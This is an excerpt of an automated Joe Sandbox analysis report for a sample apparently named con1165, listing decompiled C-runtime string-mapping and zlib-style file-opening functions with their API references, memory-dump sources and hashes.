Uniqueness Score: -1.00%

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0xda5a588d
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,049718B0), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 02DB72E8 Relevance: 22.8, APIs: 15, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02DB731A
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 02DB732C
_malloc.LIBCMT ref: 02DB73F1
_malloc.LIBCMT ref: 02DB74B3
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 02DB74DE
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 02DB7501
__freea.LIBCMT ref: 02DB750B
__freea.LIBCMT ref: 02DB7514
___ansicp.LIBCMT ref: 02DB7545
___convertcp.LIBCMT ref: 02DB7570
_malloc.LIBCMT ref: 02DB75C9
_memset.LIBCMT ref: 02DB75EB
___convertcp.LIBCMT ref: 02DB7621
__freea.LIBCMT ref: 02DB7636
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02DB7650

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
String ID:
API String ID: 2918745354-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: 9dd709b4f81a9a588890a9f7dcea1e0e37574371d766f55fbba98109cdfc83c8
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: C9B15973900159EFEF129FA4CC908EEBBB6EF88319F158469F916A6260D731CD51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02DB083C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,02DB0977,00000000,00000000,?,00000001,02DAC22D,02DAB993), ref: 02DB084E
__crt_waiting_on_module_handle.LIBCMT ref: 02DB0859

Part of subcall function 02DAE9D1: Sleep.KERNEL32(000003E8,00000000,?,02DB079F,KERNEL32.DLL,?,02DB07EB,?,00000001,02DAC22D,02DAB993), ref: 02DAE9DD
Part of subcall function 02DAE9D1: GetModuleHandleW.KERNEL32(00000001,?,02DB079F,KERNEL32.DLL,?,02DB07EB,?,00000001,02DAC22D,02DAB993), ref: 02DAE9E6

__lock.LIBCMT ref: 02DB08B4
InterlockedIncrement.KERNEL32(?), ref: 02DB08C1
__lock.LIBCMT ref: 02DB08D5
___addlocaleref.LIBCMT ref: 02DB08F3

Strings

@.B, xrefs: 02DB08E8
KERNEL32.DLL, xrefs: 02DB0848, 02DB084D, 02DB0858

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: @.B$KERNEL32.DLL
API String ID: 4021795732-2520587274
Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
Instruction ID: 19752161105239cca631d8d24c2eb058bd0e91f9c55e68f4b7992401aa44c7af
Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
Instruction Fuzzy Hash: 9F116071940745EEDB21AF35D810B8ABBE1EF08310F50452ED4AA977A1CB749A41CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 02DA5A17 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02DA5A45

Part of subcall function 02DABAB4: __FF_MSGBANNER.LIBCMT ref: 02DABAD7
Part of subcall function 02DABAB4: __NMSG_WRITE.LIBCMT ref: 02DABADE

_malloc.LIBCMT ref: 02DA5AA9
_malloc.LIBCMT ref: 02DA5B6D
_malloc.LIBCMT ref: 02DA5B97

Strings

1.2.3, xrefs: 02DA5B53, 02DA5B9E

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: _malloc
String ID: 1.2.3
API String ID: 1579825452-2310465506
